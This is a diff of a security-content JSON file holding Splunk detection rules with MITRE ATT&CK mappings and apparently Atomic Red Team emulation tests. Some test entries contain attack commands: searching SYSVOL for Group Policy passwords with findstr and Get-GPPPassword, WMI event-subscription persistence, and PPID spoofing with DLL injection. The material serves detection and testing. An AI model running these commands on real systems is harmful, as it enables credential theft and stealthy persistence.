"tags": { "name": "Clop Common Exec Parameter", "analytic_story": [ @@ -442348,7 +447000,8 @@ "Qakbot", "IcedID", "Azorult", - "Remcos" + "Remcos", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -442530,6 +447183,197 @@ ] } }, + { + "name": "Windows Suspect Process With Authentication Traffic", + "description": "This analytic identifies executables running from public or temporary locations that are communicating over windows domain authentication ports/protocol. The ports/protocols include LDAP(389), LDAPS(636), and Kerberos(88). Authentications from applications running from user controlled locations may not be malicious, however actors often attempt to access domain resources after initial compromise from executables in these locations.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_Traffic.process_id) as process_id from datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port IN (\"88\",\"389\",\"636\") AND All_Traffic.app IN (\"*\\\\users\\\\*\", \"*\\\\programdata\\\\*\", \"*\\\\temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\appdata\\\\*\", \"*\\\\perflogs\\\\*\") by All_Traffic.app,All_Traffic.src,All_Traffic.src_ip,All_Traffic.user,All_Traffic.dest,All_Traffic.dest_ip,All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rex field=app \".*\\\\\\(?.*)$\" | rename app as process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_suspect_process_with_authentication_traffic_filter`", + "tags": { + "name": "Windows Suspect Process With Authentication Traffic", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation", + "Installation" + ], + "message": "The process $process_name$ on $src$ has been communicating with $dest$ on $dest_port$.", + "mitre_attack_id": [ + "T1087", + "T1087.002", + "T1204", + "T1204.002" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "src", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User Name", + "role": [ + "Victim" + ] + }, + { + "name": "process_name", + "type": "Other", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1204", + "mitre_attack_technique": "User Execution", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "LAPSUS$" + ] + }, + { + "mitre_attack_id": "T1204.002", + "mitre_attack_technique": "Malicious File", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT12", + "APT19", + "APT28", + "APT29", + "APT30", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "Ajax Security Team", + "Andariel", + "Aoqin Dragon", + "BITTER", + "BRONZE BUTLER", + "BlackTech", + "CURIUM", + "Cobalt Group", + "Confucius", + "Dark Caracal", + "DarkHydrus", + "Darkhotel", + "Dragonfly", + "EXOTIC LILY", + "Earth Lusca", + "Elderwood", + "Ember Bear", + "FIN4", + "FIN6", + "FIN7", + "FIN8", + "Ferocious Kitten", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HEXANE", + "Higaisa", + "Inception", + "IndigoZebra", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Machete", + "Magic Hound", + "Mofang", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Naikon", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "PROMETHIUM", + "Patchwork", + "RTM", + "Rancor", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA459", + "TA505", + "TA551", + "The White Company", + "Threat Group-3390", + "Tonto Team", + "Transparent Tribe", + "Tropic Trooper", + "WIRTE", + "Whitefly", + "Windshift", + "Wizard Spider", + "admin@338", + "menuPass" + ] + } + ] + } + }, { "name": "Windows User Execution Malicious URL Shortcut File", "description": "This analytic will identify suspicious creation of URL shortcut link files. This technique was seen in CHAOS ransomware where it will drop this .url link file in %startup% folder that contains the path of its malicious dropped file to execute upon the reboot of the targeted host. The creation of this file can be created by a normal application or software but it is a good practice to verify this type of file specially the resource it tries to execute which is commonly a website.", @@ -444072,7 +448916,7 @@ ], "command_list": [ "findstr /S cpassword %logonserver%\\sysvol\\*.xml\n", - ". \\..\\ExternalPayloads\\Get-GPPPassword.ps1\nGet-GPPPassword -Verbose\n" + ". \"\\..\\ExternalPayloads\\Get-GPPPassword.ps1\"\nGet-GPPPassword -Verbose\n" ], "commands": [], "queries": [], @@ -444137,7 +448981,7 @@ } ], "executor": { - "command": ". #{gpp_script_path}\nGet-GPPPassword -Verbose\n", + "command": ". \"#{gpp_script_path}\"\nGet-GPPPassword -Verbose\n", "name": "powershell" } } @@ -444861,12 +449705,12 @@ { "description": "Curl must be installed on system.\n", "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\" -Outfile PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\nExpand-Archive -Path PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip -DestinationPath PathToAtomicsFolder\\..\\ExternalPayloads\\curl\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe C:\\Windows\\System32\\Curl.exe\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\" -Outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\"\nExpand-Archive -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip -DestinationPath\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\"\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe\" C:\\Windows\\System32\\Curl.exe\n" }, { "description": "#{input_file} must be exist on system.\n", - "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1048.002/src/artifact\" -OutFile \"#{input_file}\"\n" + "prereq_command": "if (Test-Path \"#{input_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{input_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1048.002/src/artifact\" -OutFile \"#{input_file}\"\n" } ], "executor": { @@ -449004,7 +453848,7 @@ "command_list": [ "$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';\n EventNameSpace='root\\CimV2';\n QueryLanguage=\"WQL\";\n Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"};\n$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs\n\n$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';\n CommandLineTemplate=\"$($Env:SystemRoot)\\System32\\notepad.exe\";}\n$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs\n\n$FilterToConsumerArgs = @{\nFilter = [Ref] $Filter;\nConsumer = [Ref] $Consumer;\n}\n$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs\n", "$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';\n EventNameSpace='root\\CimV2';\n QueryLanguage=\"WQL\";\n Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"};\n$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments $FilterArgs\n\n$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';\n ScriptingEngine='VBScript';\n ScriptText='\n Set objws = CreateObject(\"Wscript.Shell\")\n objws.Run \"notepad.exe\", 0, True\n '}\n$Consumer=Set-WmiInstance -Namespace \"root\\subscription\" -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs\n\n$FilterToConsumerArgs = @{\nFilter = $Filter;\nConsumer = $Consumer;\n}\n$FilterToConsumerBinding = Set-WmiInstance -Namespace 'root/subscription' -Class '__FilterToConsumerBinding' -Arguments $FilterToConsumerArgs\n", - "c:\\windows\\system32\\wbem\\mofcomp.exe \\T1546.003\\src\\T1546.003.mof\n" + "c:\\windows\\system32\\wbem\\mofcomp.exe \"\\T1546.003\\src\\T1546.003.mof\"\n" ], "commands": [], "queries": [], @@ -449073,11 +453917,11 @@ { "description": "MofComp.exe must exist on disk at specified location (#{mof_file})\n", "prereq_command": "if (Test-Path \"#{mof_file}\") { exit 0} else { exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{mof_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.003/src/T1546.003.mof\" -OutFile \"#{mof_file}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{mof_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.003/src/T1546.003.mof\" -OutFile \"#{mof_file}\"\n" } ], "executor": { - "command": "#{mofcomp_path} #{mof_file}\n", + "command": "#{mofcomp_path} \"#{mof_file}\"\n", "cleanup_command": "$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter \"Name = 'AtomicRedTeam_consumer'\"\n$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter \"Name = 'AtomicRedTeam_filter'\"\n$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query \"REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding\" -ErrorAction SilentlyContinue\n$FilterConsumerBindingToCleanup | Remove-WmiObject\n$EventConsumerToCleanup | Remove-WmiObject\n$EventFilterToCleanup | Remove-WmiObject\n", "name": "powershell" } @@ -449309,7 +454153,7 @@ { "name": "Detect WMI Event Subscription Persistence", "description": "The following analytic identifies the use of WMI Event Subscription to establish persistence or perform privilege escalation. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. This analytic is restricted by commonly added process execution and a path. If the volume is low enough, remove the values and flag on any new subscriptions.\\\nAll event subscriptions have three components \\\n1. Filter - WQL Query for the events we want. EventID equals 19 \\\n1. Consumer - An action to take upon triggering the filter. EventID equals 20 \\\n1. Binding - Registers a filter to a consumer. EventID equals 21 \\\nMonitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding. It may be pertinent to review all 3 to identify the flow of execution. In addition, EventCode 4104 may assist with any other PowerShell script usage that registered the subscription.", - "search": "`sysmon` EventID=20 | stats count min(_time) as firstTime max(_time) as lastTime by Computer User Destination | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_wmi_event_subscription_persistence_filter`", + "search": "`sysmon` EventID=20 | stats count min(_time) as firstTime max(_time) as lastTime by Computer User Destination | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_wmi_event_subscription_persistence_filter`", "tags": { "name": "Detect WMI Event Subscription Persistence", "analytic_story": [ @@ -449407,7 +454251,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -453368,7 +458212,7 @@ } ], "command_list": [ - ". \\T1134.004\\src\\PPID-Spoof.ps1\n$ppid=Get-Process explorer | select -expand id\nPPID-Spoof -ppid $ppid -spawnto \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" -dllpath \"\\T1134.004\\bin\\calc.dll\"\n", + ". \"\\T1134.004\\src\\PPID-Spoof.ps1\"\n$ppid=Get-Process explorer | select -expand id\nPPID-Spoof -ppid $ppid -spawnto \"C:\\Program Files\\Internet Explorer\\iexplore.exe\" -dllpath \"\\T1134.004\\bin\\calc.dll\"\n", "Start-ATHProcessUnderSpecificParent -FilePath $Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -CommandLine '-Command Start-Sleep 10' -ParentId $PID", "Start-ATHProcessUnderSpecificParent -ParentId $PID -TestGuid 12345678-1234-1234-1234-123456789123", "Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter \"Name = 'svchost.exe' AND CommandLine LIKE '%'\" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath $Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -CommandLine '-Command Start-Sleep 10'", @@ -453422,17 +458266,17 @@ "dependencies": [ { "description": "DLL to inject must exist on disk at specified location (#{dll_path})\n", - "prereq_command": "if (Test-Path #{dll_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll\" -OutFile \"#{dll_path}\"\n" + "prereq_command": "if (Test-Path \"#{dll_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{dll_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll\" -OutFile \"#{dll_path}\"\n" }, { "description": "PPID.ps1 must exist on disk at $PathToAtomicsFolder\\T1134.004\\src\\PPID-Spoof.ps1\n", - "prereq_command": "if (Test-Path $PathToAtomicsFolder\\T1134.004\\src\\PPID-Spoof.ps1) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path $PathToAtomicsFolder\\T1134.004\\src\\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1\" -OutFile $PathToAtomicsFolder\\T1134.004\\src\\PPID-Spoof.ps1\n" + "prereq_command": "if (Test-Path \"$PathToAtomicsFolder\\T1134.004\\src\\PPID-Spoof.ps1\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"$PathToAtomicsFolder\\T1134.004\\src\\PPID-Spoof.ps1\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1\" -OutFile \"$PathToAtomicsFolder\\T1134.004\\src\\PPID-Spoof.ps1\"\n" } ], "executor": { - "command": ". $PathToAtomicsFolder\\T1134.004\\src\\PPID-Spoof.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nPPID-Spoof -ppid $ppid -spawnto \"#{spawnto_process_path}\" -dllpath \"#{dll_path}\"\n", + "command": ". \"$PathToAtomicsFolder\\T1134.004\\src\\PPID-Spoof.ps1\"\n$ppid=Get-Process #{parent_process_name} | select -expand id\nPPID-Spoof -ppid $ppid -spawnto \"#{spawnto_process_path}\" -dllpath \"#{dll_path}\"\n", "cleanup_command": "Stop-Process -Name \"#{dll_process_name}\" -ErrorAction Ignore\nStop-Process -Name \"#{spawnto_process_name}\" -ErrorAction Ignore\n", "name": "powershell" } @@ -455410,7 +460254,7 @@ { "name": "Azure AD Authentication Failed During MFA Challenge", "description": "The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. ", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=500121 | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, status.additionalDetails, appDisplayName, userAgent | `azure_ad_authentication_failed_during_mfa_challenge_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, status.additionalDetails, appDisplayName, userAgent | `azure_ad_authentication_failed_during_mfa_challenge_filter`", "tags": { "name": "Azure AD Authentication Failed During MFA Challenge", "analytic_story": [ @@ -455426,7 +460270,7 @@ "Delivery", "Installation" ], - "message": "User $body.properties.userPrincipalName$ failed to pass MFA challenge", + "message": "User $userPrincipalName$ failed to pass MFA challenge", "mitre_attack_id": [ "T1586", "T1586.003", @@ -455554,7 +460398,7 @@ { "name": "Azure AD Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant. Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. Azure AD tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others.", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=500121 | rename body.properties.* as * | bucket span=10m _time | stats dc(_raw) AS mfa_prompts values(userPrincipalName) by userPrincipalName, status.additionalDetails, appDisplayName, userAgent, _time | where mfa_prompts > 10 | `azure_ad_multiple_failed_mfa_requests_for_user_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | bucket span=10m _time | stats dc(_raw) AS mfa_prompts values(ipAddress) as ipAddress by userPrincipalName, status.additionalDetails, appDisplayName, userAgent, _time | where mfa_prompts > 10 | `azure_ad_multiple_failed_mfa_requests_for_user_filter`", "tags": { "name": "Azure AD Multiple Failed MFA Requests For User", "analytic_story": [ @@ -455570,7 +460414,7 @@ "Delivery", "Installation" ], - "message": "Multiple Failed MFA requests for user $body.properties.userPrincipalName$", + "message": "Multiple Failed MFA requests for user $userPrincipalName$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -455588,13 +460432,6 @@ "role": [ "Victim" ] - }, - { - "name": "ipAddress", - "type": "IP Address", - "role": [ - "Attacker" - ] } ], "risk_score": 54, @@ -455842,7 +460679,7 @@ { "name": "GCP Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others.", - "search": " `gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter`", + "search": "`gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) AS user by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter`", "tags": { "name": "GCP Multiple Failed MFA Requests For User", "analytic_story": [ @@ -455878,7 +460715,7 @@ ] }, { - "name": null, + "name": "src_ip", "type": "IP Address", "role": [ "Attacker" @@ -457575,179 +462412,422 @@ ] }, { - "mitre_attack_id": "T1059.003", - "mitre_attack_technique": "Windows Command Shell", + "mitre_attack_id": "T1059.003", + "mitre_attack_technique": "Windows Command Shell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT1", + "APT18", + "APT28", + "APT3", + "APT32", + "APT37", + "APT38", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Dark Caracal", + "Darkhotel", + "Dragonfly", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "Higaisa", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Machete", + "Magic Hound", + "Metador", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Rancor", + "Silence", + "Sowbug", + "Suckfly", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-1314", + "Threat Group-3390", + "Tropic Trooper", + "Turla", + "Wizard Spider", + "ZIRCONIUM", + "admin@338", + "menuPass" + ] + } + ] + } + }, + { + "name": "Suspicious Powershell Command-Line Arguments", + "description": "This search looks for PowerShell processes started with a base64 encoded command-line passed to it, with parameters to modify the execution policy for the process, and those that prevent the display of an interactive prompt to the user. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide itself from the user, and passes an encoded script to be run on the command-line. Deprecated because almost the same as Malicious PowerShell Process - Encoded Command", + "search": "| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| search (process=*-EncodedCommand* OR process=*-enc*) process=*-Exec* | `suspicious_powershell_command_line_arguments_filter`", + "tags": { + "name": "Suspicious Powershell Command-Line Arguments", + "analytic_story": [ + "Malicious PowerShell", + "Hermetic Wiper", + "CISA AA22-320A" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation" + ], + "message": "tbd", + "mitre_attack_id": [ + "T1059.001" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "field", + "type": "Unknown", + "role": [ + "Unknown" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Any Powershell DownloadFile", + "description": "The following analytic identifies the use of PowerShell downloading a file using `DownloadFile` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*DownloadFile* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadfile_filter`", + "tags": { + "name": "Any Powershell DownloadFile", + "analytic_story": [ + "DarkCrystal RAT", + "Ingress Tool Transfer", + "Hermetic Wiper", + "Malicious PowerShell", + "Data Destruction", + "Log4Shell CVE-2021-44228" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Command And Control" + ], + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$. This behavior identifies the use of DownloadFile within PowerShell.", + "mitre_attack_id": [ + "T1059", + "T1059.001", + "T1105" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "parent_process_name", + "type": "Process", + "role": [ + "Parent Process" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] + } + ], + "risk_score": 56, + "security_domain": "endpoint", + "risk_severity": "medium", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] + }, + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", "mitre_attack_tactics": [ - "Execution" + "Command And Control" ], "mitre_attack_groups": [ - "APT1", + "APT-C-36", "APT18", "APT28", - "APT3", - "APT32", - "APT37", - "APT38", - "APT41", - "Aquatic Panda", - "BRONZE BUTLER", - "Blue Mockingbird", - "Chimera", - "Cobalt Group", - "Dark Caracal", - "Darkhotel", - "Dragonfly", - "Ember Bear", - "FIN10", - "FIN6", - "FIN7", - "FIN8", - "Fox Kitten", - "GALLIUM", - "Gamaredon Group", - "Gorgon Group", - "HAFNIUM", - "Higaisa", - "Indrik Spider", - "Ke3chang", - "Kimsuky", - "Lazarus Group", - "LazyScripter", - "Machete", - "Magic Hound", - "Metador", - "MuddyWater", - "Mustang Panda", - "Nomadic Octopus", - "OilRig", - "Patchwork", - "Rancor", - "Silence", - "Sowbug", - "Suckfly", - "TA505", - "TA551", - "TeamTNT", - "Threat Group-1314", - "Threat Group-3390", - "Tropic Trooper", - "Turla", - "Wizard Spider", - "ZIRCONIUM", - "admin@338", - "menuPass" - ] - } - ] - } - }, - { - "name": "Suspicious Powershell Command-Line Arguments", - "description": "This search looks for PowerShell processes started with a base64 encoded command-line passed to it, with parameters to modify the execution policy for the process, and those that prevent the display of an interactive prompt to the user. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide itself from the user, and passes an encoded script to be run on the command-line. Deprecated because almost the same as Malicious PowerShell Process - Encoded Command", - "search": "| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from 